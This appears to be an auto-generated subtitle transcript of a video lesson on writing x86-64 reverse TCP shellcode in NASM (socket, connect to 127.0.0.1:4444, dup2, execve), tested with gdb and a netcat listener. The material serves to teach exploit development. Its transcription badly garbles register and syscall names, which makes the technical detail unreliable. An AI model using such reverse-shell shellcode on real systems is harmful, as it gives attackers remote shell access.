WEBVTT 00:00.390 --> 00:02.560 This is where we left off in the previous video. 00:03.050 --> 00:12.270 Let us exit from here and let's create a new file called Reverse Nash, TCBY, Dot Nazem. 00:13.920 --> 00:23.430 And as usual, let's start with the text section and let's use a global directive to specify our entry 00:23.430 --> 00:26.970 point and let's specify our entry point. 00:27.990 --> 00:31.500 Now, let's close this file and. 00:33.310 --> 00:43.540 Let's run stress once again and let's just copy this output and let's keep it inside our river, slash 00:43.840 --> 00:52.070 Tsipi Darkness and file temporarily, we can use this output to craft our assembly program. 00:53.050 --> 00:57.110 The first thing is to clear all the registers that we are going to use. 00:57.640 --> 01:01.150 So let's write clearing out. 01:02.940 --> 01:06.370 RBA are on. 01:07.110 --> 01:23.340 So let's just clear them that X cosmonautics, Zah RBI, comma, RBI, Tzar, RSI, comma RSI and finally 01:23.460 --> 01:26.880 the RBA comma RDX. 01:27.390 --> 01:31.140 So in each case, ARRIGO'S is going to hold Narcisco. 01:31.140 --> 01:36.090 No, RBI is going to hold in the first argument to the second. 01:36.900 --> 01:43.440 Oddisee is going to hold the second argument to the second and RDX is going to hold. 01:43.470 --> 01:45.270 The third argument to this is Scott. 01:45.960 --> 01:46.400 All right. 01:46.590 --> 01:49.620 So let's begin by writing the circuit, Cisco. 01:53.240 --> 02:00.600 Now, the first step is to find out the Cisco number, so let's open up a new tab and find out our Cisco. 02:01.370 --> 02:07.590 So I'm just going to use look at uni and study and sixty four, 64. 02:09.170 --> 02:13.850 And this is the file which contains our Cisco numbers. 02:14.420 --> 02:19.100 So let's use cat grab socket. 02:20.480 --> 02:21.010 There it is. 02:21.380 --> 02:24.370 41 is the Cisco number for socket. 02:24.890 --> 02:29.220 So let's use add our eggs one. 02:30.230 --> 02:35.700 So this is the Cisco number for socket. 02:36.500 --> 02:37.670 That's the second number. 02:37.700 --> 02:41.290 Now let's set up the first argument for a socket system. 02:41.930 --> 02:49.490 If you remember, the first argument of socket call is if underscore in it, it's a constant value for 02:49.490 --> 02:52.700 IPV for connections and its value is always two. 02:53.210 --> 02:58.900 So we are going to use add RBI Kamata. 02:59.150 --> 03:02.820 So the first argument of socket call is ready. 03:03.470 --> 03:10.610 Now the next argument is going to be Soke underscored stream and Soke underscored streams. 03:10.610 --> 03:12.290 Value is defined to be one. 03:12.410 --> 03:13.800 This is also a constant. 03:14.150 --> 03:19.370 So let's use add autosite comma one. 03:20.060 --> 03:23.080 And finally we will have to set up ADEX. 03:23.090 --> 03:26.490 And if you remember, the RDX value should be zero. 03:27.140 --> 03:27.890 Why is that? 03:28.130 --> 03:34.420 Because if you look at a reverse see program, the third argument always contains zero. 03:34.940 --> 03:37.030 So that's what we are going to place. 03:37.040 --> 03:42.170 And if you notice, X already contains zero, so we don't have to do anything now. 03:42.590 --> 03:46.600 Now all we have to do is we will have to use the line system. 03:47.060 --> 03:54.410 So once this is done, this is called number 41, which is socket is going to be executed with the argument 03:54.410 --> 03:55.770 that we have just set up. 03:56.480 --> 03:59.270 Now, there is one important thing that we need to remember here. 03:59.840 --> 04:06.500 Once as this call is executed, the return value will be stored in Addicks register. 04:07.130 --> 04:11.390 This is the return value when we were executing the program, using estrus. 04:11.630 --> 04:17.250 But now we don't know what the return value is, so we have to capture what we are getting in our X 04:17.300 --> 04:17.820 register. 04:18.380 --> 04:24.260 So let us quickly use move idea at X. 04:24.620 --> 04:31.670 So after executing this Siskel, we are capturing the return value which is stored in our register in 04:31.680 --> 04:32.990 the RBI register. 04:33.500 --> 04:35.660 Why are we storing it in the register? 04:36.020 --> 04:42.800 We can actually use any register, but audio register is being used because in most of the cases this 04:42.800 --> 04:48.320 return value is the first argument and the first argument always goes into audio. 04:48.650 --> 04:53.480 And that's the reason why we are using our data to stay here so we don't have to move it again from 04:53.480 --> 04:58.700 a different register into RBI if we just place it directly into audio register here. 04:59.240 --> 05:03.440 Now let's take a pictorial representation of our next steps. 05:03.830 --> 05:06.670 So I'm opening up my slide area. 05:07.550 --> 05:13.730 If you remember, we are done with this socket called audio register contains the value for any one 05:14.240 --> 05:20.050 idea contains two, RSA contains one and ADEX contains zero. 05:20.540 --> 05:26.510 So we are done with the socket call and it returns some value, which is going to be placed in order 05:26.890 --> 05:32.630 to immediately when we execute the others is called connect and ducktail. 05:32.990 --> 05:37.280 We are going to change this value inside our text register. 05:37.580 --> 05:42.680 So we are just immediately saving it into a different register, which is our idea in this case. 05:43.310 --> 05:50.270 And this value, which is stored in ardia, is going to be used in dupatta calls as well as in the connection. 05:51.150 --> 05:55.820 So the next step after the socket call is to write the connection. 05:56.570 --> 06:03.290 When we write this connect call, Artex register contains the second number and 42 is the second number 06:03.290 --> 06:04.240 for Connect. 06:04.490 --> 06:06.020 We can quickly check that. 06:07.850 --> 06:10.190 Let's grab for Connect this time. 06:12.830 --> 06:16.600 Dirigo, 42, is the second number for Connect. 06:17.330 --> 06:23.440 Similarly, thirty three is the second number for dukedom. 06:24.260 --> 06:25.760 Let's go back to our slides. 06:26.300 --> 06:27.660 Here we are today. 06:27.740 --> 06:30.290 Three is the second number for dukedom. 06:30.590 --> 06:35.660 So when we write this up to call, we are going to place 33 in Artex register. 06:36.140 --> 06:41.750 And when we write this connection, we are going to place the value 42 into our register. 06:42.380 --> 06:45.410 And the first argument is ardia in both the cases. 06:45.680 --> 06:49.730 And the value is already stored here from ADEX. 06:50.000 --> 06:52.330 So we don't have to set up the first arguin. 06:52.540 --> 07:00.070 Anymore, when we write this connect call and do the calls now, the second argument for Connect, which 07:00.070 --> 07:05.480 is Autosite, if you remember, this is the address of a structure. 07:06.070 --> 07:09.160 So first, we will have to prepare the structure. 07:09.610 --> 07:14.160 And in the RSA register, we are going to place the address of that structure. 07:14.980 --> 07:18.580 So to prepare the structure, if you remember, we need three things. 07:18.880 --> 07:26.380 The IP address port and the CINEFAMILY, which is AHF underscore in it, if you remember, that's a 07:26.380 --> 07:28.200 constant with the value too. 07:28.720 --> 07:30.600 So we will have to place them in this order. 07:31.060 --> 07:33.430 First, we are going to push 127. 07:33.430 --> 07:35.280 Not one, not one, not one. 07:36.040 --> 07:40.390 After that, we are going to push a work which is four four, four four. 07:40.870 --> 07:44.610 And after that we are going to push another word, which is two. 07:45.400 --> 07:46.480 So let's do that. 07:46.540 --> 07:53.770 So this prepares our structure and once the entire structure is placed on the stack, Arizpe points 07:53.770 --> 07:57.220 to it like we did in the case of execution code. 07:57.460 --> 08:03.040 We can simply move this arizpe into RSA and that will point to this structure. 08:03.700 --> 08:06.580 And finally, Eyeborgs contains 16. 08:06.790 --> 08:08.800 We got this value from estrus. 08:09.730 --> 08:10.220 All right. 08:10.240 --> 08:11.390 So that's pretty much it. 08:11.470 --> 08:14.620 This is the only complicated part that we are left with. 08:14.920 --> 08:18.870 Once we are done with this connect code, everything will be very straightforward. 08:19.390 --> 08:23.700 So let's go ahead and prepare this structure and write this connection. 08:24.130 --> 08:32.470 So I am switching to my virtual machine and let's start writing our structure, preparing structure 08:33.310 --> 08:35.090 for connect. 08:36.430 --> 08:36.900 All right. 08:36.910 --> 08:39.880 So let's use push. 08:41.150 --> 08:45.380 We want to push 127 dot one dot one, dark one. 08:46.000 --> 08:58.750 So one should be zero zero one and this one is going to be zero one and the next one is going to be 08:58.780 --> 08:59.530 zero one. 09:00.010 --> 09:04.740 And finally, one twenty seven is going to be seven F in hex. 09:06.520 --> 09:07.690 Let me quickly show that. 09:10.850 --> 09:19.920 127 decimal is seven F in X, it is the next step is to push this forward number four four four four. 09:20.480 --> 09:26.650 Let's quickly check the hex equivalent of this four four four four. 09:28.250 --> 09:35.150 It becomes one one five C, so we will have to use the reverse order once again, some just using push 09:36.320 --> 09:40.310 word zero x five, C one one. 09:41.150 --> 09:47.380 And the next one is to use push what the value is going to be two for this AV underscore in it. 09:47.690 --> 09:50.200 So we are just going to push zero x two. 09:50.900 --> 09:51.290 All right. 09:51.350 --> 09:53.770 So that should prepare our structure. 09:54.290 --> 09:58.460 If you remember, this is what is expected on the stack. 09:58.850 --> 10:03.880 So let's quickly debug the program and check if this is placed on the stack. 10:04.250 --> 10:08.720 Let's go back to Rehame and quickly debug the shell code that we have it in so far. 10:10.070 --> 10:22.310 I'm saving this file and let's use nazem reverse dash tsipi dot nazim dash oh reverse dash tsipi dot 10:22.310 --> 10:26.150 o f and 64. 10:27.710 --> 10:34.910 There are some errors here, probably because of these comments, so let's just comment out. 10:37.880 --> 10:38.420 There you go. 10:38.570 --> 10:47.750 Now let's try to assemble once again, yep, everything works fine, reverse dot o f sorry, National 10:48.320 --> 10:50.950 Review's DCB Hillinger. 10:52.160 --> 11:00.500 Now let's see what GDP dot slash, reverse slash TCB and let's set up a breakpoint ad and let's go start 11:00.500 --> 11:01.770 and run the program. 11:03.230 --> 11:04.280 Let's do a site. 11:04.670 --> 11:10.160 What we want to check is whether we are properly placing the structure on the stack or not. 11:16.620 --> 11:23.640 All right, we are here at the corner, and this is where we are storing our written value in our dear 11:23.640 --> 11:24.150 register. 11:24.630 --> 11:27.710 After that, we are using these push instructions. 11:28.110 --> 11:33.780 So after completing this push W. instruction, we should have proper stacks set up. 11:34.200 --> 11:40.740 So let's step aside once again and once again and once again. 11:41.340 --> 11:46.620 If you notice the top of the step after pushing all the three values, this is what we have. 11:47.100 --> 11:53.190 If you go back to the slide, we have exactly the same thing, starting with zero one, ending with 11:53.190 --> 11:57.820 zero two, starting with zero one, ending with zero two. 11:58.230 --> 11:59.010 So there it is. 11:59.350 --> 12:03.090 We have properly placed the structure on the top of the stack. 12:03.540 --> 12:07.860 Now, this top of the stack is being pointed by Arizpe Register. 12:08.100 --> 12:14.520 So now all we have to do is we will just have to move the value of Arizpe register into autosite. 12:14.940 --> 12:17.760 So let's construct our Connect column. 12:19.470 --> 12:25.810 I'm quitting this debugger and let's use them once again. 12:26.850 --> 12:31.260 Let's go down, let's use connect. 12:32.660 --> 12:39.180 And the first step is to move the top of the stack into autosite. 12:40.460 --> 12:43.600 So this is the second argument to connect call. 12:44.360 --> 12:49.340 If you remember, the first argument is idea, which already has the required value. 12:49.880 --> 12:55.030 And finally, the third argument is going to be 16, which is the size of the structure. 12:55.310 --> 12:58.040 So that goes into RDX. 13:00.260 --> 13:02.180 16 is Hexton. 13:02.180 --> 13:04.550 So is going to use zero here. 13:05.450 --> 13:11.220 Once this is done, we will have to prepare the second number in order to register for connect call. 13:11.780 --> 13:19.370 So let's first clear out of X because it contains the return value from the previous call, which is 13:19.370 --> 13:20.000 socket. 13:20.780 --> 13:30.260 Now let's add the value 42, which is the second number for Connect Canacol and let's just type system. 13:30.770 --> 13:33.220 So that finishes our Connect column. 13:33.590 --> 13:36.540 So we are done with socket call and we are done with Connect Code. 13:37.040 --> 13:40.240 Now the next couple of calls are pretty easy to do. 13:40.880 --> 13:55.220 Two is what we are going to do next doob to step in and loop to study out and do a study error. 13:56.090 --> 14:05.300 Let's begin with the study and I'm just going to clear out X register once again and I'll just add this 14:05.300 --> 14:08.260 is called number into our which is 33. 14:09.590 --> 14:18.390 And then I will just clear RSA register idea already contains the socket file descriptor. 14:18.410 --> 14:21.360 The second argument for Esslin is zero. 14:21.830 --> 14:25.460 So we are just making Idrissi zero by using inside instruction. 14:25.760 --> 14:27.920 So astrally in is already done. 14:28.520 --> 14:31.010 All we have to do is invoke the second. 14:32.990 --> 14:35.630 Next is still out. 14:35.990 --> 14:44.450 Once again we will do zah irex atx ag irex comma thirty three. 14:45.740 --> 14:51.920 We will have to do this again because when you execute this call the return value will be placed in 14:51.920 --> 14:54.550 our X register so it won't have 33 anymore. 14:54.800 --> 14:58.840 So we are just setting up 33 once again into ATX register. 14:59.750 --> 15:09.110 Once this is done we can just use add Idrissi comma one because for study out the second argument is 15:09.110 --> 15:12.130 one currently Oddisee contains zero. 15:12.140 --> 15:13.370 So we are just adding one. 15:15.110 --> 15:18.530 And once this is done, we can once again execute this call. 15:19.580 --> 15:26.400 After all of this, let's write Doob to study error call, which is going to be exact. 15:26.570 --> 15:30.490 Our eggs are eggs and our eggs. 15:30.500 --> 15:38.600 Commentary three once again and then add on to say comma one, because currently RSA contains one. 15:38.900 --> 15:41.300 So we are just adding one to that. 15:41.310 --> 15:44.520 So it becomes two, which is the value for Essley error. 15:45.920 --> 15:49.300 And finally, just call Sysco. 15:50.000 --> 15:50.530 That's it. 15:50.570 --> 15:51.890 We are done with writing. 15:51.890 --> 15:53.260 All this is called now. 15:53.340 --> 15:54.950 The last one is exactly. 15:55.350 --> 15:59.270 We are just going to copy it from the previous shell code that we have written. 15:59.840 --> 16:00.830 So let's use 16:06.470 --> 16:13.040 this file, which is exactly not Azem, and let's just copy it from here. 16:15.550 --> 16:20.540 And let's go back to River Shall Schenkkan, and let's start here. 16:21.250 --> 16:21.770 That's it. 16:21.790 --> 16:23.190 So we are done with the rivers. 16:23.200 --> 16:28.930 This official called Let's save the File and let's use. 16:31.370 --> 16:35.550 Nazeem to assemble this and L.E. to link this. 16:36.200 --> 16:45.990 Let's quickly use a net cat listener to check if the same code is working fine and see Basche and Al 16:46.330 --> 16:48.890 Lippy four four four four. 16:50.120 --> 16:52.830 And let's execute, not slash. 16:53.150 --> 16:54.690 It was dash TCAP. 16:56.390 --> 16:59.090 Let's go back to the listener and look at that. 16:59.210 --> 17:03.820 We got a show, so we have completed our reverse distribution code. 17:04.360 --> 17:09.190 Now, obviously, the next step is to quickly verify if it has animal rights. 17:09.620 --> 17:17.930 So let's use object dump should be reverse dash TCBY Dash M for internal syntax. 17:19.550 --> 17:22.850 So looks like there are a bunch of null bytes here. 17:23.540 --> 17:25.100 Here are three null bytes. 17:26.070 --> 17:26.880 That's pretty much it. 17:27.020 --> 17:29.660 This is the only place where we have null bytes. 17:30.590 --> 17:32.860 X register should have the value. 17:32.910 --> 17:37.820 Then let's go back and check what instruction is causing these null rights. 17:38.210 --> 17:39.700 We can actually check that here. 17:40.010 --> 17:46.070 If you see this, it's immediately after these push instructions, so it should be the connect call. 17:46.430 --> 17:48.530 So let's go back to Shakoor. 17:53.220 --> 17:56.100 And let's go to the collect call. 18:00.190 --> 18:09.850 And if you see this, we did not use RDX anywhere, so we can just use add instruction here instead 18:09.850 --> 18:10.270 of. 18:14.340 --> 18:20.120 All right, so let's save the file and let's assemble and link it once again. 18:23.330 --> 18:23.930 There it is. 18:24.110 --> 18:27.710 Let's quickly check by using the net catch listener. 18:32.760 --> 18:38.490 Once again, it worked fine, let's double check if we have removed all the lights. 18:41.380 --> 18:47.530 Looks like we are pretty much done with the shell called, there are no problems and there are no nonwhites. 18:47.900 --> 18:52.280 However, this Shell core has some redundant instructions. 18:52.640 --> 18:55.040 For instance, look at these two instructions. 18:55.040 --> 19:02.420 We have written these two instructions multiple times, ones here, the ones here and ones here. 19:02.420 --> 19:07.670 So we have written it three times so we can optimize this shell code a bit. 19:07.970 --> 19:10.640 So let's see how we can do that in the next video.